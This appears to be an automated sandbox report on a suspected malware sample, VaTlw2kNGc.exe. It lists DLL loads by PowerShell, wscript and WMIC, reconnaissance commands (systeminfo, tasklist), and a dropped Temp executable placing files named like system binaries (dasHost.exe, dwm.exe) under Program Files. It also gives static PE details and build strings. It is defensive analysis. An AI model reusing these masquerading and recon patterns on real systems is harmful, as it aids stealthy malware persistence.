Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: iertutil.dll

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe

File opened: C:\Users\user\Desktop\pyvenv.cfg

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\21b1a557fd31cc
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Mozilla Firefox\dwm.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Mozilla Firefox\6cb0b6c459d5d3

Source: VaTlw2kNGc.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: VaTlw2kNGc.exe

Static file information: File size 22154667 > 1048576

Source: VaTlw2kNGc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: VaTlw2kNGc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: VaTlw2kNGc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: VaTlw2kNGc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: VaTlw2kNGc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: VaTlw2kNGc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: VaTlw2kNGc.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: VaTlw2kNGc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 00000004.00000000.1711609232.0000000000956000.00000002.00000001.01000000.00000006.sdmp, Build.exe, 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmp, s.exe, 0000000B.00000003.1750025071.0000000007689000.00000004.00000020.00020000.00000000.sdmp, s.exe, 0000000B.00000000.1741603424.0000000000663000.00000002.00000001.01000000.00000014.sdmp, s.exe, 0000000B.00000002.1764006617.0000000000663000.00000002.00000001.01000000.00000014.sdmp, svchost.exe, 0000000C.00000002.1767211934.0000000000913000.00000002.00000001.01000000.0000001B.sdmp, svchost.exe, 0000000C.00000003.1760108075.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1758798682.0000000000913000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\select.pdb source: based.exe, 00000008.00000002.2653255671.00007FFE130C1000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: based.exe, 00000008.00000002.2642370223.00007FFE126EB000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000008.00000002.2632791212.00007FFE11ED1000.00000040.00000001.01000000.00000017.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: based.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\libssl-1_1.pdb source: based.exe, based.exe, 00000008.00000002.2509833770.00007FFDFB705000.00000040.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: based.exe, 00000008.00000002.2433044590.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: based.exe, 00000008.00000002.2661087553.00007FFE13301000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: based.exe, 00000008.00000002.2532291858.00007FFDFB99F000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: based.exe, 00000008.00000002.2647849411.00007FFE12E11000.00000040.00000001.01000000.00000021.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: based.exe, 00000008.00000002.2610651844.00007FFE11501000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: based.exe, 00000008.00000002.2601619118.00007FFE10301000.00000040.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: based.exe, 00000008.00000002.2642370223.00007FFE126EB000.00000040.00000001.01000000.00000015.sdmp
